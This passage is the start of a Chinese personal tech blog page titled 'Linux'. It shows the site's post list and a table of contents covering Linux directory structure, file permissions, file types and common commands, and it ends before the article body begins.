<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Linux | 黄金贤的博客</title>
  <meta name="keywords" content="">
  <meta name="description" content="Linux | 黄金贤的博客">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="#1 windows 关闭更新# 步骤一，win+r 打开 服务 窗口 services.msc  # 步骤二，选择 windows update，查看属性，常规&gt;启动类型选择“禁用”，恢复&gt;全部修改成“无操作” Windows Update # 步骤三，win+r 打开 注册表 窗口 gpedit.msc # 步骤四，计算机配置&gt;管理模版&gt;Windows组件&gt;Win">
<meta property="og:type" content="article">
<meta property="og:title" content="BSL">
<meta property="og:url" content="https://hjxstart.github.io/2026/01/04/BSL/index.html">
<meta property="og:site_name" content="黄金贤的博客">
<meta property="og:description" content="#1 windows 关闭更新# 步骤一，win+r 打开 服务 窗口 services.msc  # 步骤二，选择 windows update，查看属性，常规&gt;启动类型选择“禁用”，恢复&gt;全部修改成“无操作” Windows Update # 步骤三，win+r 打开 注册表 窗口 gpedit.msc # 步骤四，计算机配置&gt;管理模版&gt;Windows组件&gt;Win">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-01-04T13:37:49.000Z">
<meta property="article:modified_time" content="2026-01-11T14:51:09.378Z">
<meta property="article:author" content="黄金贤">
<meta property="article:tag" content="计算机网络 数据库 操作系统 数据结构 算法 Java Nodejs">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>


<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 8.0.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>黄金贤</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://github.com/hjxstart"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:hjxstart@126.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1726283687&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>




<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(69)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="运维">
                        
                        运维
                        <small>(20)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="开发">
                        
                        开发
                        <small>(12)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="读书">
                        
                        读书
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="安全">
                        
                        安全
                        <small>(3)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="工具">
                        
                        工具
                        <small>(10)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="读写">
                        
                        读写
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="数据库">
                        
                        数据库
                        <small>(5)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="网络">
                        
                        网络
                        <small>(14)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="69">
<input type="hidden" id="yelog_site_word_count" value="287k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://github.com/hjxstart">hjxstart</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        <a id="top" class="全部文章 网络 "
           href="/2024/05/06/HCIE%20Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HCIE Lab">HCIE Lab</span>
            <span class="post-date" title="2024-05-06 19:42:00">2024/05/06</span>
        </a>
        
        <a id="top" class="全部文章 安全 "
           href="/2025/08/17/PTE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="PTE">PTE</span>
            <span class="post-date" title="2025-08-17 11:12:00">2025/08/17</span>
        </a>
        
        <a id="top" class="全部文章 安全 "
           href="/2024/08/23/CISO/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CISO">CISO</span>
            <span class="post-date" title="2024-08-23 19:29:00">2024/08/23</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2021/09/09/VMware/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VMware">VMware</span>
            <span class="post-date" title="2021-09-09 15:38:00">2021/09/09</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/04/04/PXE-Kickstart/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="PXE+Kickstart">PXE+Kickstart</span>
            <span class="post-date" title="2025-04-04 10:45:00">2025/04/04</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/02/12/KylinOS/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="KylinOS">KylinOS</span>
            <span class="post-date" title="2025-02-12 16:47:00">2025/02/12</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/08/24/KylinOS-FAQ/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="KylinOS FAQ">KylinOS FAQ</span>
            <span class="post-date" title="2025-08-24 11:07:00">2025/08/24</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/08/24/Windows/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Windows">Windows</span>
            <span class="post-date" title="2025-08-24 11:19:00">2025/08/24</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2022/03/24/Linux/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Linux">Linux</span>
            <span class="post-date" title="2022-03-24 11:53:00">2022/03/24</span>
        </a>
        
        <a id="top" class="全部文章 工具 "
           href="/2024/07/28/NTLite/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="NTLite">NTLite</span>
            <span class="post-date" title="2024-07-28 21:32:00">2024/07/28</span>
        </a>
        
        <a id="top" class="全部文章 数据库 "
           href="/2020/03/19/MySQL/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2020-03-19 21:51:00">2020/03/19</span>
        </a>
        
        <a id="top" class="全部文章 开发 "
           href="/2025/09/13/Php/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Php">Php</span>
            <span class="post-date" title="2025-09-13 23:10:00">2025/09/13</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2023/05/13/IBMC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="IBMC">IBMC</span>
            <span class="post-date" title="2023-05-13 21:04:00">2023/05/13</span>
        </a>
        
        <a  class="全部文章 "
           href="/2026/01/04/BSL/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="BSL">BSL</span>
            <span class="post-date" title="2026-01-04 21:37:49">2026/01/04</span>
        </a>
        
        <a  class="全部文章 读写 "
           href="/2025/11/27/%E5%86%99%E4%BD%9C%E8%A7%84%E8%8C%83/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="写作规范">写作规范</span>
            <span class="post-date" title="2025-11-27 16:04:08">2025/11/27</span>
        </a>
        
        <a  class="全部文章 "
           href="/2025/11/04/openEuler/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="openEuler">openEuler</span>
            <span class="post-date" title="2025-11-04 14:34:44">2025/11/04</span>
        </a>
        
        <a  class="全部文章 安全 "
           href="/2025/08/21/cisp-practice/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="cisp-practice">cisp-practice</span>
            <span class="post-date" title="2025-08-21 19:41:00">2025/08/21</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2025/04/24/OpenStack/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OpenStack">OpenStack</span>
            <span class="post-date" title="2025-04-24 09:04:00">2025/04/24</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/04/16/%E7%BD%91%E7%BB%9C%E5%B7%A5%E7%A8%8B%E5%B8%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="网络工程师">网络工程师</span>
            <span class="post-date" title="2024-04-16 22:14:00">2024/04/16</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/STP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="STP">STP</span>
            <span class="post-date" title="2024-01-27 14:01:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/VLAN/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VLAN">VLAN</span>
            <span class="post-date" title="2024-01-27 11:42:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/LLDP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="LLDP">LLDP</span>
            <span class="post-date" title="2024-01-27 11:31:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/Telnet/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Telnet">Telnet</span>
            <span class="post-date" title="2024-01-27 10:45:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/SSH/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SSH">SSH</span>
            <span class="post-date" title="2024-01-27 10:44:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/22/WireGuard/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="WireGuard">WireGuard</span>
            <span class="post-date" title="2023-12-22 07:40:00">2023/12/22</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/12/21/Stack-Port/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Stack Port">Stack Port</span>
            <span class="post-date" title="2023-12-21 19:31:00">2023/12/21</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/18/RouterOS/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="RouterOS">RouterOS</span>
            <span class="post-date" title="2023-12-18 17:05:00">2023/12/18</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/18/Git/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="GIT">GIT</span>
            <span class="post-date" title="2023-12-18 17:00:00">2023/12/18</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2023/11/30/HelpDesk/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HelpDesk">HelpDesk</span>
            <span class="post-date" title="2023-11-30 21:21:00">2023/11/30</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/11/18/OpenWrt/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OpenWrt">OpenWrt</span>
            <span class="post-date" title="2023-11-18 17:03:00">2023/11/18</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/06/01/HCNP-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="华为NP网络实验">华为NP网络实验</span>
            <span class="post-date" title="2023-06-01 10:46:04">2023/06/01</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/06/01/CCNP-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CCNP Lab">CCNP Lab</span>
            <span class="post-date" title="2023-06-01 10:46:00">2023/06/01</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2023/04/26/1Panel/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="1Panel">1Panel</span>
            <span class="post-date" title="2023-04-26 14:09:00">2023/04/26</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/08/HCNA-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HCNA Lab">HCNA Lab</span>
            <span class="post-date" title="2023-04-08 11:46:00">2023/04/08</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/07/CCNA-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CCNA Lab">CCNA Lab</span>
            <span class="post-date" title="2023-04-07 20:13:29">2023/04/07</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/07/OSPF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OSPF">OSPF</span>
            <span class="post-date" title="2023-04-07 19:19:00">2023/04/07</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2022/08/12/HomeLab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HomeLab">HomeLab</span>
            <span class="post-date" title="2022-08-12 15:09:00">2022/08/12</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2022/08/10/FRP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="FRP">FRP</span>
            <span class="post-date" title="2022-08-10 10:22:24">2022/08/10</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2022/07/28/WDS-MDT/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="WDS+MDT">WDS+MDT</span>
            <span class="post-date" title="2022-07-28 21:33:00">2022/07/28</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2022/06/21/Anaconda/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Anaconda">Anaconda</span>
            <span class="post-date" title="2022-06-21 20:56:00">2022/06/21</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2022/05/25/%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E5%B8%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="网络规划师">网络规划师</span>
            <span class="post-date" title="2022-05-25 11:57:00">2022/05/25</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2022/03/14/influxDB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="InfluxDB">InfluxDB</span>
            <span class="post-date" title="2022-03-14 13:25:00">2022/03/14</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2022/03/06/MongoDB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="MongoDB">MongoDB</span>
            <span class="post-date" title="2022-03-06 17:38:00">2022/03/06</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2021/12/27/VIM/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VIM">VIM</span>
            <span class="post-date" title="2021-12-27 09:15:00">2021/12/27</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/12/16/vsftpd/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VSFTPD">VSFTPD</span>
            <span class="post-date" title="2021-12-16 08:49:00">2021/12/16</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2021/10/06/Redis/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="REDIS">REDIS</span>
            <span class="post-date" title="2021-10-06 17:19:00">2021/10/06</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/20/K8s-lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="K8s_lab">K8s_lab</span>
            <span class="post-date" title="2021-09-20 08:04:00">2021/09/20</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/15/K8s/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="K8s">K8s</span>
            <span class="post-date" title="2021-09-15 20:48:00">2021/09/15</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/08/Ingress/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Ingress">Ingress</span>
            <span class="post-date" title="2021-09-08 23:56:00">2021/09/08</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/08/Harbor/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Harbor">Harbor</span>
            <span class="post-date" title="2021-09-08 18:04:00">2021/09/08</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/26/GO/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Go">Go</span>
            <span class="post-date" title="2021-08-26 11:50:00">2021/08/26</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/15/Java%E5%A4%9A%E7%BA%BF%E7%A8%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Java多线程">Java多线程</span>
            <span class="post-date" title="2021-08-15 14:36:00">2021/08/15</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/08/11/Nginx/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Nginx">Nginx</span>
            <span class="post-date" title="2021-08-11 23:28:00">2021/08/11</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/06/Maven/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Maven">Maven</span>
            <span class="post-date" title="2021-08-06 09:38:00">2021/08/06</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/31/Springboot%E9%A1%B9%E7%9B%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Springboot项目">Springboot项目</span>
            <span class="post-date" title="2021-07-31 19:34:00">2021/07/31</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/07/22/Docker/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Docker">Docker</span>
            <span class="post-date" title="2021-07-22 14:53:00">2021/07/22</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/19/SpringSecurity/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SpringSecurity">SpringSecurity</span>
            <span class="post-date" title="2021-07-19 20:58:00">2021/07/19</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/13/Mybatis/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Mybatis">Mybatis</span>
            <span class="post-date" title="2021-07-13 10:38:00">2021/07/13</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/05/NVM/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="NVM">NVM</span>
            <span class="post-date" title="2021-07-05 08:15:00">2021/07/05</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/26/Java-Project/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Java Project">Java Project</span>
            <span class="post-date" title="2021-06-26 07:58:00">2021/06/26</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/23/Vue/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Vue">Vue</span>
            <span class="post-date" title="2021-06-23 10:48:00">2021/06/23</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/08/SpringBoot2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SpringBoot2">SpringBoot2</span>
            <span class="post-date" title="2021-06-08 16:51:00">2021/06/08</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/06/07/CentOS7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CentOS7">CentOS7</span>
            <span class="post-date" title="2021-06-07 23:16:00">2021/06/07</span>
        </a>
        
        <a  class="全部文章 读书 "
           href="/2021/04/18/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="设计模式">设计模式</span>
            <span class="post-date" title="2021-04-18 22:19:00">2021/04/18</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2021/03/22/SQL/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SQL">SQL</span>
            <span class="post-date" title="2021-03-22 18:33:00">2021/03/22</span>
        </a>
        
        <a  class="全部文章 读书 "
           href="/2021/03/14/%E6%97%B6%E9%97%B4%E7%AE%A1%E7%90%86/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="时间管理">时间管理</span>
            <span class="post-date" title="2021-03-14 21:49:00">2021/03/14</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2021/03/14/Hexo/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Hexo">Hexo</span>
            <span class="post-date" title="2021-03-14 08:31:00">2021/03/14</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2020/09/12/UltraISO/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="UltraISO">UltraISO</span>
            <span class="post-date" title="2020-09-12 11:42:00">2020/09/12</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2020/09/12/Ventoy/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Ventoy">Ventoy</span>
            <span class="post-date" title="2020-09-12 11:42:00">2020/09/12</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-Linux" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Linux</h1>
    
    <div class="article-meta">
        
        <span class="top"><a>置顶</a></span>
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="运维">运维</a>
            
        </span>
        
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2025-10-08 19:23:27'>2022-03-24 11:53</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:6.5k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Linux%E5%9F%BA%E7%A1%80"><span class="toc-text">Linux基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux-%E6%A6%82%E5%BF%B5"><span class="toc-text">Linux 概念</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux-%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84"><span class="toc-text">Linux 目录结构</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux%E6%A0%87%E5%87%86%E8%BE%93%E5%85%A5%E8%BE%93%E5%87%BA"><span class="toc-text">Linux标准输入输出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%9D%83%E9%99%90"><span class="toc-text">文件权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E7%89%B9%E6%AE%8A%E6%9D%83%E9%99%90"><span class="toc-text">文件特殊权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B"><span class="toc-text">Linux文件类型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%99%AE%E9%80%9A%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%EF%BC%88Regular-File%EF%BC%89"><span class="toc-text">普通文件类型（Regular File）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%EF%BC%88Directory-File%EF%BC%89"><span class="toc-text">目录文件类型（Directory File）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E5%A4%87%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%EF%BC%88Device-File%EF%BC%89"><span class="toc-text">设备文件类型（Device File）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E6%8E%A5%E5%AD%97%E6%96%87%E4%BB%B6%EF%BC%88Socket%EF%BC%89"><span class="toc-text">套接字文件（Socket）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%A1%E9%81%93%E6%96%87%E4%BB%B6%EF%BC%88FIFO%EF%BC%89"><span class="toc-text">管道文件（FIFO）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%93%BE%E6%8E%A5%E6%96%87%E4%BB%B6%EF%BC%88Symbolic-link%EF%BC%89"><span class="toc-text">链接文件（Symbolic link）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E6%96%87%E4%BB%B6%EF%BC%88Special-file%EF%BC%89"><span class="toc-text">特殊文件（Special file）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux-%E5%91%BD%E4%BB%A4"><span class="toc-text">Linux 命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6"><span class="toc-text">文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95"><span class="toc-text">目录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6-%E7%9B%AE%E5%BD%95"><span class="toc-text">文件&amp;目录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#echo%E5%91%BD%E4%BB%A4"><span class="toc-text">echo命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cat-%E5%91%BD%E4%BB%A4"><span class="toc-text">cat 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#more-%E5%91%BD%E4%BB%A4"><span class="toc-text">more 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less-%E5%91%BD%E4%BB%A4"><span class="toc-text">less 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#group-%E5%91%BD%E4%BB%A4%EF%BC%88%E4%B8%89%E5%89%91%E5%AE%A2%E4%B9%8B%E4%B8%80%EF%BC%89"><span class="toc-text">group 命令（三剑客之一）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wc-%E5%91%BD%E4%BB%A4"><span class="toc-text">wc 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#find-%E5%91%BD%E4%BB%A4%EF%BC%88%E9%87%8D%E8%A6%81%EF%BC%89"><span class="toc-text">find 命令（重要）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bzip2-gzip-%E6%89%93%E5%8C%85-%E5%8E%8B%E7%BC%A9%EF%BC%88%E9%87%8D%E8%A6%81%EF%BC%89"><span class="toc-text">bzip2 | gzip 打包 &amp; 压缩（重要）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#uname-%E5%91%BD%E4%BB%A4"><span class="toc-text">uname 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#service-%E5%91%BD%E4%BB%A4"><span class="toc-text">service 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#systemctl-%E5%91%BD%E4%BB%A4"><span class="toc-text">systemctl 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cut-%E5%91%BD%E4%BB%A4"><span class="toc-text">cut 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux-%E7%97%95%E8%BF%B9%E5%91%BD%E4%BB%A4"><span class="toc-text">Linux 痕迹命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%9A%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F"><span class="toc-text">多命令执行方式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#vim-%E6%96%87%E4%BB%B6%E7%BC%96%E8%BE%91"><span class="toc-text">vim 文件编辑</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" 